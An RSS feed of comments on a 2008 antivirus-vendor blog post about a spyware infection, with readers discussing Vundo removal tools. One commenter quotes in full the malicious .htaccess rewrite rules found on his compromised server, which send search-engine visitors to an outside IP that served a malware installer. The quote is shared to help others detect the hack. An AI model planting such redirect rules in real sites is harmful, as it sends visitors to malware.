<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: ATTENTION! If your computer is struck by the spyware, you could suffer</title>
	<atom:link href="http://blog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer.html/feed" rel="self" type="application/rss+xml" />
	<link>http://blog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer.html</link>
	<description>ThreatFire™ AntiVirus protects when others can&#039;t</description>
	<lastBuildDate>Fri, 06 Nov 2009 17:43:38 -0600</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Brad Peterson</title>
		<link>http://blog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer.html/comment-page-1#comment-101</link>
		<dc:creator>Brad Peterson</dc:creator>
		<pubDate>Sun, 28 Dec 2008 07:27:00 +0000</pubDate>
		<guid isPermaLink="false">http://newblog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer/#comment-101</guid>
		<description>In my case, it was the Vundo malware.&lt;br/&gt;&lt;br/&gt;I first tried finding and removing it with AVG anti-virus, Spybot, Lavasoft Ad-aware, Microsoft Defender, Vundo removal tool, and Hijackthis.  They did very little finding it or giving me clues on how to remove it.&lt;br/&gt;&lt;br/&gt;I then tried Malwarebytes&#039; Anti-Malware, and that found a lot more, but not enough.&lt;br/&gt;&lt;br/&gt;The fix came from SuperAntiSpyware.  That was far and away the best tool to find this bugger and remove it for good.</description>
		<content:encoded><![CDATA[<p>In my case, it was the Vundo malware.</p>
<p>I first tried finding and removing it with AVG anti-virus, Spybot, Lavasoft Ad-aware, Microsoft Defender, Vundo removal tool, and Hijackthis.  They did very little finding it or giving me clues on how to remove it.</p>
<p>I then tried Malwarebytes&#8217; Anti-Malware, and that found a lot more, but not enough.</p>
<p>The fix came from SuperAntiSpyware.  That was far and away the best tool to find this bugger and remove it for good.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: ThreatFire Blogger</title>
		<link>http://blog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer.html/comment-page-1#comment-74</link>
		<dc:creator>ThreatFire Blogger</dc:creator>
		<pubDate>Tue, 02 Dec 2008 17:22:00 +0000</pubDate>
		<guid isPermaLink="false">http://newblog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer/#comment-74</guid>
		<description>redmapleleaf-&lt;br/&gt;&lt;br/&gt;Sorry to hear that your server was compromised, and thanks for posting that valuable information about htaccess.&lt;br/&gt;At the same time, the problem that is described in the post is a client issue. Your redirected site visitors unfortunately were coerced into downloading and running a file similar in name to &quot;A9installer_880147.exe&quot;, and then saw the problems described in the post on their system.&lt;br/&gt;&lt;br/&gt;Thanks again, and nice work cleaning up the issue on your site.</description>
		<content:encoded><![CDATA[<p>redmapleleaf-</p>
<p>Sorry to hear that your server was compromised, and thanks for posting that valuable information about htaccess.<br />At the same time, the problem that is described in the post is a client issue. Your redirected site visitors unfortunately were coerced into downloading and running a file similar in name to &#8220;A9installer_880147.exe&#8221;, and then saw the problems described in the post on their system.</p>
<p>Thanks again, and nice work cleaning up the issue on your site.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: redmapleleaf</title>
		<link>http://blog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer.html/comment-page-1#comment-71</link>
		<dc:creator>redmapleleaf</dc:creator>
		<pubDate>Wed, 26 Nov 2008 15:22:00 +0000</pubDate>
		<guid isPermaLink="false">http://newblog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer/#comment-71</guid>
		<description>This problem is a server side, not a client side. That is your computer is probably OK. My webserver has been infected with this problem and all my clients are suffering from it every time they connected to my website. &lt;br/&gt;&lt;br/&gt;Upon contacting my host, they were able to determine the problem which was in the .htaccess file. Some how this file was compromised on their server and start redirecting traffic to the site in Modova/Eastern Europe that you are seeing. Here is the content of the .htaccess file that responsible for this problem:&lt;br/&gt;&lt;br/&gt;RewriteEngine On&lt;br/&gt;RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]&lt;br/&gt;RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]&lt;br/&gt;RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]&lt;br/&gt;RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]&lt;br/&gt;RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]&lt;br/&gt;RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]&lt;br/&gt;RewriteRule .* http://89.28.13.203/in.html?s=jh [R,L]&lt;br/&gt;&lt;br/&gt;I hope this could help somebody from too much suffering.</description>
		<content:encoded><![CDATA[<p>This problem is a server side, not a client side. That is your computer is probably OK. My webserver has been infected with this problem and all my clients are suffering from it every time they connected to my website. </p>
<p>Upon contacting my host, they were able to determine the problem which was in the .htaccess file. Some how this file was compromised on their server and start redirecting traffic to the site in Modova/Eastern Europe that you are seeing. Here is the content of the .htaccess file that responsible for this problem:</p>
<p>RewriteEngine On<br />RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]<br />RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]<br />RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]<br />RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]<br />RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]<br />RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]<br />RewriteRule .* <a href="http://89.28.13.203/in.html?s=jh" rel="nofollow">http://89.28.13.203/in.html?s=jh</a> [R,L]</p>
<p>I hope this could help somebody from too much suffering.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kurt</title>
		<link>http://blog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer.html/comment-page-1#comment-66</link>
		<dc:creator>Kurt</dc:creator>
		<pubDate>Tue, 18 Nov 2008 06:54:00 +0000</pubDate>
		<guid isPermaLink="false">http://newblog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer/#comment-66</guid>
		<description>Hah, right!</description>
		<content:encoded><![CDATA[<p>Hah, right!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Disk4mat</title>
		<link>http://blog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer.html/comment-page-1#comment-65</link>
		<dc:creator>Disk4mat</dc:creator>
		<pubDate>Tue, 18 Nov 2008 05:27:00 +0000</pubDate>
		<guid isPermaLink="false">http://newblog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer/#comment-65</guid>
		<description>LOL&lt;br/&gt;&lt;br/&gt;&quot;The spyware&quot; to imply there is only one out there. If only, if only right?</description>
		<content:encoded><![CDATA[<p>LOL</p>
<p>&#8220;The spyware&#8221; to imply there is only one out there. If only, if only right?</p>
]]></content:encoded>
	</item>
</channel>
</rss>
